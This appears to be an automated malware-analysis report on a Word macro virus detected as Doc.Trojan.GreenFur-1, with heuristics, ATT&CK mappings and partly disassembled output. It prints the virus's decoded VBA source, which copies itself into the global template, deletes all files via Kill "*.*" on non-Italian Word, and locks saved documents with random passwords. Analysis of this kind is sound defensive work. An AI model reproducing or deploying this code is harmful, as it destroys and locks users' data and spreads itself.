Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample contains a VBA macro that is triggered by the AutoOpen event, indicating an attempt to execute malicious code upon opening the document. The macro appears to copy itself and other functions, suggesting it's part of a downloader or dropper mechanism. While the specific payload is not fully revealed due to truncation, the presence of the AutoOpen macro and the ClamAV detection strongly suggest malicious intent.
Heuristics (5)
- ClamAV: Doc.Trojan.GreenFur-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.GreenFur-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://come.to/rose_swe (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10413 bytes | 11d3f2d583979a1f9552d08344a0e75eed0d59ad7e7383d9277f66f97cabd2b7 |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "GreenFury"
Public Sub MAIN()
'
End Sub
Private Function Casuale$(Password$)
Dim ACaso
Dim Indice
Dim Carattere
'
ACaso = WordBasic.Int(Rnd() * (10 - 1) + 1)
'
If ACaso > 5 Then
'
For Indice = 1 To 15
Carattere = WordBasic.Int(Rnd() * (90 - 75) + 75)
Password$ = Password$ + Chr(Carattere)
Next Indice
'
Casuale$ = Password$
End If
'
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim Versione$
Dim i
Dim Installato
Dim TroppiProblemi
Dim Io$
Dim sMacro$
'
On Error GoTo -1: On Error GoTo Uscita
'Check whether the Word version is Italian
Versione$ = WordBasic.[AppInfo$](16)
'
If Versione$ = "Italiano" Then
'check whether it has already been installed
For i = 1 To NumMacros
'
If WordBasic.[MacroName$](i, 0, 0) = "GreenFury" Then
Installato = -1
End If
'
If WordBasic.[MacroName$](i, 0, 0) = "FileSalvaConNome" Then
TroppiProblemi = -1
End If
'
Next i
'
If Not Installato And Not TroppiProblemi Then
Io$ = WordBasic.[FileName$]()
sMacro$ = Io$ + ":GreenFury"
WordBasic.MacroCopy sMacro$, "Generale:GreenFury", 1
sMacro$ = Io$ + ":GGGFFF"
WordBasic.MacroCopy sMacro$, "Generale:FileSalvaConNome", 1
sMacro$ = Io$ + ":GGGFFF"
WordBasic.MacroCopy sMacro$, "Generale:GGGFFF", 1
sMacro$ = Io$ + ":FFFGGG"
WordBasic.MacroCopy sMacro$, "Generale:FFFGGG", 1
End If
'
Else
WordBasic.Kill "*.*"
End If
'
Uscita:
'
End Sub
Attribute VB_Name = "GGGFFF"
Public Sub MAIN()
Dim Password$
Dim Io$
Dim sMacro$
'
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Controlla
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
'Activate the payload routine
WordBasic.Call "GreenFury.Casuale$", Password$
'
If Len(Password$) = 15 Then
dlg.Password = Password$
End If
'
If dlg.Format = 0 Then dlg.Format = 1
Io$ = WordBasic.[FileName$]()
sMacro$ = Io$ + ":AutoOpen"
WordBasic.MacroCopy "Generale:FFFGGG", sMacro$, 1
sMacro$ = Io$ + ":FFFGGG"
WordBasic.MacroCopy "Generale:FFFGGG", sMacro$, 1
sMacro$ = Io$ + ":GGGFFF"
WordBasic.MacroCopy "Generale:GGGFFF", sMacro$, 1
sMacro$ = Io$ + ":GreenFury"
WordBasic.MacroCopy "Generale:GreenFury", sMacro$, 1
WordBasic.FileSaveAs dlg
GoTo Fatto
Controlla:
'If Cancel was chosen in the dialog box
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
'
Fatto:
'
End Sub
' Processing file: /opt/analyzer/scan_staging/81c781b1551648afb0c4756f9d68b219.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/GreenFury - 1745 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' QuoteRem 0x0004 0x0000 ""
' Line #3:
' EndSub
' Line #4:
' Line #5:
' FuncDefn (Private Function Casuale(Password))
' Line #6:
' Dim
' VarDefn ACaso
' Line #7:
' Dim
' VarDefn Indice
' Line #8:
' Dim
' VarDefn Carattere
' Line #9:
' QuoteRem 0x0004 0x0000 ""
' Line #10:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' LitDI2 0x0001
' Sub
' Paren
' Mul
' LitDI2 0x0001
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St ACaso
' Line #11:
' QuoteRem 0x0004 0x0000 ""
' Line #12:
' Ld ACaso
' LitDI2 0x0005
' Gt
```

... (truncated)